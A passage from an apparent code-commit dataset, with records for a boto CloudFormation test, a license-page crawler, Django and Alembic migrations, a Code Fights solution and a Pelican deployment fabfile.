This repros #1037.<commit_after>#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
|
219133a80fe4f772f64846b985e891b9536c35ea
|
crawler.py
|
crawler.py
|
import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
Add CLI tool that crawls choosealicense for OSS licenses.
|
Add CLI tool that crawls choosealicense for OSS licenses.
|
Python
|
mit
|
sxn/notary
|
Add CLI tool that crawls choosealicense for OSS licenses.
|
import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
<commit_before><commit_msg>Add CLI tool that crawls choosealicense for OSS licenses.<commit_after>
|
import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
Add CLI tool that crawls choosealicense for OSS licenses.import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
<commit_before><commit_msg>Add CLI tool that crawls choosealicense for OSS licenses.<commit_after>import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
|
5e4f960e8caf488533eb38d943e1da8c4a260631
|
bluebottle/funding/migrations/0062_auto_20201222_1241.py
|
bluebottle/funding/migrations/0062_auto_20201222_1241.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
Add migration that adds donor permission to staff
|
Add migration that adds donor permission to staff
|
Python
|
bsd-3-clause
|
onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle
|
Add migration that adds donor permission to staff
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
<commit_before><commit_msg>Add migration that adds donor permission to staff<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
Add migration that adds donor permission to staff# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
<commit_before><commit_msg>Add migration that adds donor permission to staff<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
|
79c074133d51fa5ac1193756e01e26b5245a4b97
|
source/harmony/schema/collector.py
|
source/harmony/schema/collector.py
|
# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
Add standard interface for collecting schemas.
|
Add standard interface for collecting schemas.
|
Python
|
apache-2.0
|
4degrees/harmony
|
Add standard interface for collecting schemas.
|
# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
<commit_before><commit_msg>Add standard interface for collecting schemas.<commit_after>
|
# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
Add standard interface for collecting schemas.# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
<commit_before><commit_msg>Add standard interface for collecting schemas.<commit_after># :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
|
fa2a7d10522233b7287dfda28854be961868a40f
|
CodeFights/increaseNumberRoundness.py
|
CodeFights/increaseNumberRoundness.py
|
#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
Solve Code Fights increase number roundness problem
|
Solve Code Fights increase number roundness problem
|
Python
|
mit
|
HKuz/Test_Code
|
Solve Code Fights increase number roundness problem
|
#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Solve Code Fights increase number roundness problem<commit_after>
|
#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
Solve Code Fights increase number roundness problem#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Solve Code Fights increase number roundness problem<commit_after>#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
|
096fbae1461d66f84b203d8a49ea3ae65a3f4bd4
|
alembic/versions/fa8cf884aa8e_migrate_to_jsonb.py
|
alembic/versions/fa8cf884aa8e_migrate_to_jsonb.py
|
"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
Migrate info tables to JSONB format.
|
Migrate info tables to JSONB format.
NOTE: this will only delete the materialed view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.
|
Python
|
agpl-3.0
|
Scifabric/pybossa,PyBossa/pybossa,Scifabric/pybossa,PyBossa/pybossa
|
Migrate info tables to JSONB format.
NOTE: this will only delete the materialed view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.
|
"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
<commit_before><commit_msg>Migrate info tables to JSONB format.
NOTE: this will only delete the materialed view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.<commit_after>
|
"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
Migrate info tables to JSONB format.
NOTE: this will only delete the materialed view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them."""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
<commit_before><commit_msg>Migrate info tables to JSONB format.
NOTE: this will only delete the materialed view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.<commit_after>"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
|
2aa977c55e59d9f92db31c773e6533537fad780b
|
fabfile.py
|
fabfile.py
|
from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
env.msg = commit_message
"""Publish to GitHub Pages"""
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
Add fabric configuration for deploy
|
Add fabric configuration for deploy
|
Python
|
mit
|
PythonNepal/pythonnepal.github.io
|
Add fabric configuration for deploy
|
from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
env.msg = commit_message
"""Publish to GitHub Pages"""
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
<commit_before><commit_msg>Add fabric configuration for deploy<commit_after>
|
from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
env.msg = commit_message
"""Publish to GitHub Pages"""
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
Add fabric configuration for deployfrom fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
env.msg = commit_message
"""Publish to GitHub Pages"""
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
<commit_before><commit_msg>Add fabric configuration for deploy<commit_after>from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
